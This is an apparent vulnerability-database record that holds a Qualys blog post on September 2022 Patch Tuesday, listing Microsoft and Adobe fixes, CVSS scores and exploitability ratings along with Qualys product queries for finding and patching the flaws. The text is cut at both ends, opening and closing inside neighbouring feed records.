"CVE-2021-31964", "CVE-2021-31965", "CVE-2021-31966", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-31978", "CVE-2021-31983", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T21:19:29", "id": "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-03T20:04:30", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 63 vulnerabilities (aka flaws) in the September 2022 update, including five (5) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE). This month&#x27;s Patch Tuesday fixes two (2) zero-day vulnerabilities, with one (1) actively exploited***** in attacks (**[CVE-2022-37969](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969>)***,[ ](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>)**[CVE-2022-23960](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23960>)**). Earlier this month, on September 1-2, 2022, Microsoft also released a total of 16 Microsoft Edge (Chromium-Based) updates, one (1) addressing a Remote Code Execution (RCE) ([CVE-2022-38012](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38012>)) ranked _**Low**_.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service, Elevation of Privilege, Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution, and Security Feature Bypass.\n\n## **The September 2022 Microsoft Vulnerabilities are Classified as follows:**\n\n\n\n# **Notable Microsoft Vulnerabilities Patched**\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-34718](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34718>) | Windows TCP/IP Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nAn unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPSec is enabled, which could enable a remote code execution exploitation on that machine.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-34721](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34721>), [CVE-2022-34722](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34722>) | Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nAn unauthenticated attacker could send a specially crafted IP packet to a target machine that is running Windows and has IPSec enabled, which could enable a remote code execution exploitation. NOTE: This vulnerability_ only impacts IKEv1_. IKEv2 is not impacted. However, all Windows Servers are affected because they accept both V1 and V2 packets.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Zero-Day Vulnerabilities Addressed**\n\nA vulnerability is classified as a zero-day if it is publicly disclosed or actively exploited with no official fix available.\n\n### [CVE-2022-37969](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969>) | Windows Common Log File System Driver Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nAn attacker must already have access and the ability to run code on the target system. This technique does not allow for remote code execution in cases where the attacker does not already have that ability on the target system.\n\nAn attacker who successfully exploited this vulnerability could gain SYSTEM privileges.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n### [CVE-2022-23960](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23960>) | Windows Common Log File System Driver Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of [5.6](<https://nvd.nist.gov/vuln/detail/CVE-2022-23960>)/10.\n\n[CVE-2022-23960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23960>) is regarding a vulnerability known as Spectre-BHB. MITRE created this CVE on behalf of Arm Limited.\n\nPlease see [Spectre-BHB on arm Developer](<https://developer.arm.com/Arm%20Security%20Center/Spectre-BHB>) for more information.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): _**Exploitation Less Likely**_\n\n* * *\n\n# **Microsoft Important Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Sep>) covers multiple Microsoft product families, including Azure, Browser, Developer Tools, [Extended Security Updates (ESU)](<https://docs.microsoft.com/en-us/lifecycle/faq/extended-security-updates>), Microsoft Dynamics, Microsoft Office, System Center, and Windows.\n\nA total of 92 unique Microsoft products/versions are affected, including but not limited to .NET, Azure Arc, Microsoft Dynamics, Microsoft Edge (Chromium-based), Microsoft Office, Microsoft Office SharePoint, SPNEGO Extended Negotiation, Visual Studio Code, Windows Common Log File System Driver, Windows Credential Roaming Service, Windows Defender, Windows Distributed File System (DFS), Windows DPAPI (Data Protection Application Programming Interface), Windows Enterprise App Management, Windows Event Tracing, Windows Group Policy, Windows IKE Extension, Windows Kerberos, Windows Kernel, Windows LDAP - Lightweight Directory Access Protocol, Windows ODBC Driver, Windows OLE, Windows Print Spooler Components, Windows Remote Access Connection Manager, Windows TCP/IP, and Windows Transport Security Layer (TLS).\n\nDownloads include Cumulative Update, Monthly Rollup, Security Hotpatch Update, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-38009](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38009>) | Microsoft SharePoint Server Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nIn a network-based attack, an authenticated attacker with Manage List permissions could execute code remotely on the SharePoint Server.\n\nThe attacker must be authenticated to the target site, with the permission to use Manage Lists within SharePoint.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-26929](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26929>) | .NET Framework Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nThe word **Remote** in the title refers to the location of the attacker. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE). The attack itself is carried out locally.\n\nFor example, when the score indicates that the **Attack Vector** is **Local** and **User Interaction** is **Required**, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-38007](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38007>) | Azure Guest Configuration and Azure Arc-enabled Servers Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nAn attacker who successfully exploited the vulnerability could replace Microsoft-shipped code with their own code, which would then be run as root in the context of a Guest Configuration daemon. On an Azure VM with the Guest Configuration Linux Extension installed, this would run in the context of the GC Policy Agent daemon. On an Azure Arc-enabled server, it could run in the context of the GC Arc Service or Extension Service daemons.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n## **Microsoft Edge | Last But Not Least**\n\nEarlier in September 2022, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities including [CVE-2022-38012](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38012>). The vulnerability assigned to the CVE is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. For more information, please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>).\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38012>)[CVE-2022-38012](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38012>) | Microsoft Edge (Chromium-based) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.7/10.\n\nThe word **Remote** in the title refers to the location of the attacker. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE). The attack itself is carried out locally.\n\nFor example, when the score indicates that the **Attack Vector** is **Local** and **User Interaction** is **Required**, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer.\n\nThis vulnerability could lead to a browser sandbox escape.\n\nSuccessful exploitation of this vulnerability requires an attacker to take additional actions prior to exploitation to prepare the target environment.\n\nNOTE: [Per Microsoft&#x27;s severity guidelines](<https://www.microsoft.com/en-us/msrc/bounty-new-edge>), the amount of user interaction or preconditions required to allow this sort of exploitation downgraded the severity. The CVSS scoring system doesn&#x27;t allow for this type of nuance which explains why this CVE is rated as Low, but the CVSSv3.1 score is 7.7\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released seven (7) [security bulletins and advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 63 vulnerabilities affecting Adobe Animate, Bridge, Illustrator, InCopy, InDesign, Photoshop, and Experience Manager applications. Of these 63 vulnerabilities, 35 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_** and 28 rated as _****_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_****_; ranging in severity from a CVSS score of 5.3/10 to 7.8/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-40](<https://helpx.adobe.com/security/products/experience-manager/apsb22-40.html>) | Security Update Available for Adobe Experience Manager\n\nThis update resolves 11 [_****__****_](<https://helpx.adobe.com/security/severity-ratings.html>)_****_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_****_ vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released updates for Adobe Experience Manager (AEM). These updates resolve vulnerabilities rated [Important](<https://helpx.adobe.com/security/severity-ratings.html>). Successful exploitation of these vulnerabilities could result in arbitrary code execution and security feature bypass.\n\n* * *\n\n### [APSB22-49](<https://helpx.adobe.com/security/products/bridge/apsb22-49.html>) | Security Update Available for Adobe Bridge\n\nThis update resolves 12 vulnerabilities:\n\n * Ten (10) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): _3\n\nAdobe has released a security update for Adobe Bridge. This update addresses [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities that could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-50](<https://helpx.adobe.com/security/products/indesign/apsb22-50.html>) | Security Update Available for Adobe InDesign\n\nThis update resolves 18 vulnerabilities:\n\n * Eight (8) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Ten (10) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): _3\n\nAdobe has released a security update for Adobe InDesign. This update addresses multiple [critical ](<https://helpx.adobe.com/security/severity-ratings.html>)and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution, arbitrary file system read, and memory leak.\n\n* * *\n\n### [APSB22-52](<https://helpx.adobe.com/security/products/photoshop/apsb22-52.html>) | Security Update Available for Adobe Photoshop\n\nThis update resolves ten (10) vulnerabilities:\n\n * Nine (9) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * One (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Photoshop for Windows and macOS. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-53](<https://helpx.adobe.com/security/products/incopy/apsb22-53.html>) | Security Update Available for Adobe InCopy\n\nThis update resolves seven (7) vulnerabilities:\n\n * Five (5) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe InCopy. This update addresses multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n### [APSB22-54](<https://helpx.adobe.com/security/products/animate/apsb22-54.html>) | Security Update Available for Adobe Animate\n\nThis update resolves two (2) [](<https://helpx.adobe.com/security/severity-ratings.html>)[_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Animate. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user. \n\n* * *\n\n### [APSB22-55](<https://helpx.adobe.com/security/products/illustrator/apsb22-55.html>) | Security Update Available for Adobe Illustrator\n\nThis update resolves three (3) vulnerabilities:\n\n * One (1) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Illustrator 2022. This update resolves [critical ](<https://helpx.adobe.com/security/severity-ratings.html>)and [important ](<https://helpx.adobe.com/security/severity-ratings.html>)vulnerabilities that could lead to arbitrary code execution and memory leak.\n\n* * *\n\n# **About Qualys Patch Tuesday**\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n* * *\n\n## Qualys [Threat Protection](<https://www.qualys.com/apps/threat-protection/>) High-Rated Advisories from August to September 2022 Patch Tuesday Advisory\n\n_Sorted in Descending Order_\n\n * [Microsoft Patches Vulnerabilities 79 including 16 Microsoft Edge (Chromium-Based); with 2 Zero-days and 5 Critical in Patch Tuesday September 2022 Edition](<https://threatprotect.qualys.com/2022/09/14/microsoft-patches-vulnerabilities-79-including-16-microsoft-edge-chromium-based-with-2-zero-days-and-5-critical-in-patch-tuesday-september-2022-edition/>)\n * [Google Chrome Releases Fix for the Zero-day Vulnerability (CVE-2022-3075)](<https://threatprotect.qualys.com/2022/08/10/microsoft-patches-121-vulnerabilities-with-two-zero-days-and-17-critical-plus-20-microsoft-edge-chromium-based-in-august-2022-patch-tuesday/>)\n * [Atlassian Bitbucket Server and Data Center Command Injection Vulnerability (CVE-2022-36804)](<https://threatprotect.qualys.com/2022/08/29/atlassian-bitbucket-server-and-data-center-command-injection-vulnerability-cve-2022-36804/>)\n * [GitLab Patches Critical Remote Command Execution Vulnerability (CVE-2022-2884)](<https://threatprotect.qualys.com/2022/08/25/gitlab-patches-critical-remote-command-execution-vulnerability-cve-2022-2884/>)\n * [Apple Releases Security Updates to patch two Zero-Day Vulnerabilities (CVE-2022-32893 and CVE-2022-32894)](<https://threatprotect.qualys.com/2022/08/18/apple-releases-security-updates-to-patch-two-zero-day-vulnerabilities-cve-2022-32893-and-cve-2022-32894/>)\n * [Google Chrome Zero-Day Insufficient Input Validation Vulnerability (CVE-2022-2856)](<https://threatprotect.qualys.com/2022/08/18/google-chrome-zero-day-insufficient-input-validation-vulnerability-cve-2022-2856/>)\n * [Palo Alto Networks (PAN-OS) Reflected Amplification Denial-of-Service (DoS) Vulnerability (CVE-2022-0028)](<https://threatprotect.qualys.com/2022/08/16/palo-alto-networks-pan-os-reflected-amplification-denial-of-service-dos-vulnerability-cve-2022-0028/>)\n * [Microsoft Patches 121 Vulnerabilities with Two Zero-days and 17 Critical; Plus 20 Microsoft Edge (Chromium-Based) in August 2022 Patch Tuesday](<https://threatprotect.qualys.com/2022/08/10/microsoft-patches-121-vulnerabilities-with-two-zero-days-and-17-critical-plus-20-microsoft-edge-chromium-based-in-august-2022-patch-tuesday/>)\n * [VMware vRealize Operations Multiple Vulnerabilities Patched in the Latest Security update (CVE-2022-31672, CVE-2022-31673, CVE-2022-31674, &amp; CVE-2022-31675)](<https://threatprotect.qualys.com/2022/08/10/vmware-vrealize-operations-multiple-vulnerabilities-patched-in-the-latest-security-update-cve-2022-31672-cve-2022-31673-cve-2022-31674-cve-2022-31675/>)\n\n* * *\n\n## Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`91937` OR qid:`91938` OR qid:`91939` OR qid:`91940` OR qid:`91941` OR qid:`91942` OR qid:`91943` OR qid:`91944` OR qid:`91945` OR qid:`91946` OR qid:`91947` OR qid:`110415` OR qid:`110416` OR qid:`377590` ) \n\n\n\n [Qualys VMDR Recognized as Best VM Solution by SC Awards 2022 &amp; Leader by GigaOm](<https://blog.qualys.com/product-tech/2022/08/22/qualys-vmdr-recognized-as-best-vm-solution-by-sc-awards-2022-leader-by-gigaom>) **_New_**\n\n [A Deep Dive into VMDR 2.0 with Qualys TruRisk\u2122](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>)\n\n* * *\n\n## Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches with one click.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`91937` OR qid:`91938` OR qid:`91939` OR qid:`91940` OR qid:`91941` OR qid:`91942` OR qid:`91943` OR qid:`91944` OR qid:`91945` OR qid:`91946` OR qid:`91947` OR qid:`110415` OR qid:`110416` OR qid:`377590` ) \n\n\n\n [Let Smart Automation Reduce the Risk of Zero-Day Attacks on Third-Party Applications](<https://blog.qualys.com/qualys-insights/2022/09/08/let-smart-automation-reduce-the-risk-of-zero-day-attacks-on-third-party-applications-2>) **_New_**\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n## Evaluate Vendor-Suggested Workarounds with [Policy Compliance](<https://www.qualys.com/forms/policy-compliance/>)\n\nQualys\u2019 [Policy Compliance Control Library](<https://vimeo.com/700790353>) makes it easy to evaluate your technology infrastructure when the current situation requires the implementation of a vendor-suggested workaround. A workaround is a method, sometimes used temporarily, for achieving a task or goal when the usual or planned method isn&#x27;t working. Information technology often uses a workaround to overcome hardware, programming, or communication problems. Once a problem is fixed, a workaround is usually abandoned. _ [Source](<https://www.techtarget.com/whatis/definition/workaround>)_\n\nThe following Qualys [Policy Compliance Control IDs (CIDs), and System Defined Controls (SDC) ](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/module_pc/controls/controls_lp.htm>)have been updated to support Microsoft recommended workaround for this Patch Tuesday:\n\n#### [CVE-2022-38007](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38007>)** | Azure Guest Configuration and Azure Arc-enabled Servers Elevation of Privilege (EoP) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nPolicy Compliance Control IDs (CIDs) for Checking Azure Arc-Enabled Servers on Linux:\n\n * **14112**: Status of the services installed on the Linux/UNIX host (stopped, running, failed, dead, \u2026) \n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n#### [CVE-2022-34718](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34718>)**** | ****Windows TCP/IP Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * **3720**: Status of the &#x27;IPSEC Services&#x27; service\n * **14916**: Status of Windows Services \n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n#### [CVE-2022-35838](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35838>)****** | **HTTP V3 Denial of Service (DoS) Vulnerability****\n\nThis vulnerability has a CVSSv3.1 score of 7.5/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * **24717**: Status of the &#x27;HTTP/3&#x27; service\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n#### [CVE-2022-33679 ](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33679>), [CVE-2022-33647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33647>)**** | **Windows Kerberos Elevation of Privilege (EoP) Vulnerability**\n\nThese vulnerabilities have a CVSSv3.1 score of 8.1/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * **17108**: Status of the &#x27;KDC support for claims, compound authentication and Kerberos armoring&#x27; setting (Enabled / Disabled)\n * **17109**: Status of the &#x27;Kerberos client support for claims, compound authentication and Kerberos armoring&#x27; setting\n * **17197**: Status of the &#x27;KDC support for claims, compound authentication, and Kerberos armoring&#x27; setting\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n#### [CVE-2022-38004](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38004>) **| Windows Network File System Remote Code Execution (RCE) Vulnerability** \n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * **1161**: Status of the &#x27;Fax&#x27; service\n * **14916**: Status of Windows Services\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\nThe following QQL will return a posture assessment for the CIDs for this Patch Tuesday:\n \n \n control:( id:`1161` OR id:`3720` OR id:`14112` OR id:`14916` OR id:`14916` OR id:`17108` OR id:`17108` OR id:`17109` OR id:`17109` OR id:`17197` OR id:`17197` OR id:`24717` ) \n\n\n\n [Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/23/mitigating-the-risk-of-zero-day-vulnerabilities-by-using-compensating-controls>) **_New_**\n\n [Policy Compliance (PC) | Policy Library Update Blogs](<https://notifications.qualys.com/tag/policy-library>)\n\n* * *\n\n**Patch Tuesday is Complete.**\n\n* * *\n\n# Qualys [This Month in Vulnerabilities and Patches](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>) Webinar Series \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month&#x27;s Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. \n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities &amp; Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)\n\n* * *\n\n## NEW &amp; NOTEWORTHY UPCOMING EVENTS\n\nThe content within this section will spotlight Vulnerability Management, Patch Management, Threat Protections, and Policy Compliance adjacent events available to our new and existing customers.\n\n* * *\n\n[WEBINARS](<https://gateway.on24.com/wcc/eh/3347108/category/91385/upcoming-webinars>)\n\n## [Introducing Qualys Threat Thursdays](<https://blog.qualys.com/vulnerabilities-threat-research/2022/09/01/introducing-qualys-threat-research-thursdays>)\n\n\n\nThe **Qualys Research Team** announces the first in a series of regular monthly webinars covering the latest threat intelligence analysis and insight. Join us each month for Threat Thursdays, where we will zero in on a specific malware or other exploit observed in the wild\u2026 and how to defend against it.\n\nPlease join us for the first [Threat Thursdays](<https://event.on24.com/wcc/r/3925198/52A4000CBD17D2B16AFD5F56B3C9D15A>) monthly webinar where the Qualys Threat Research Team will present the latest threat intelligence\u2026 each and every month! \n\nTo quickly navigate to Threat Thursday blog posts, please use <https://blog.qualys.com/tag/threat-thursday>\n\n* * *\n\n[CONFERENCES](<https://www.qualys.com/qsc/locations/>)\n\n[](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821>)[Register Now](<https://www.qualys.com/qsc/2022/las-vegas/?utm_source=qualys-homepage&utm_medium=event&utm_campaign=homepage-banner-qsc-2022&utm_term=qsc-q4-2022&utm_content=qualys-homepage-qsc&leadsource=344572821>)\n\n## [Qualys Annual Security Conference](<https://www.qualys.com/qsc/get-notified/#las-vegas/>) #QSC22\n\nNovember 7-10, 2022 \n\nThe Venetian Resort Las Vegas, 3355 Las Vegas Blvd. South, Las Vegas, NV 89109, US\n\n[Book your hotel here](<https://book.passkey.com/gt/218594637?gtid=9914abda1b2fe722d872e0ac3e0bdc09>) &amp; take advantage of the discounted QSC rate of $229+ per night\n\nOr find a conference [near you](<https://www.qualys.com/qsc/locations/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T20:00:00", "type": "qualysblog", "title": "September 2022 Patch Tuesday | Microsoft Releases 63 Vulnerabilities with 5 Critical, plus 16 Microsoft Edge (Chromium-Based); Adobe Releases 7 Advisories, 63 Vulnerabilities with 35 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0028", "CVE-2022-22047", "CVE-2022-23960", "CVE-2022-26929", "CVE-2022-2856", "CVE-2022-2884", "CVE-2022-30134", "CVE-2022-3075", "CVE-2022-31672", "CVE-2022-31673", "CVE-2022-31674", "CVE-2022-31675", "CVE-2022-32893", "CVE-2022-32894", "CVE-2022-33647", "CVE-2022-33679", "CVE-2022-34718", "CVE-2022-34721", "CVE-2022-34722", "CVE-2022-35838", "CVE-2022-36804", "CVE-2022-37969", "CVE-2022-38004", "CVE-2022-38007", "CVE-2022-38009", "CVE-2022-38012"], "modified": "2022-09-13T20:00:00", "id": "QUALYSBLOG:DE2E40D3BB574E53C7448F3A304849C9", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T00:03:27", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 121 vulnerabilities (aka flaws) in the August 2022 update, including 17 vulnerabilities classified as **_Critical_** as they allow Elevation of Privilege (EoP) and Remote Code Execution (RCE). This month&#x27;s Patch Tuesday fixes two (2) zero-day vulnerabilities, with one (1) actively exploited***** in attacks ([CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>)*****,[ CVE-2022-30134](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30134>)). Earlier this month, August 5, 2022, Microsoft also released 20 Microsoft Edge (Chromium-Based) updates addressing Elevation of Privilege (EoP), Remote 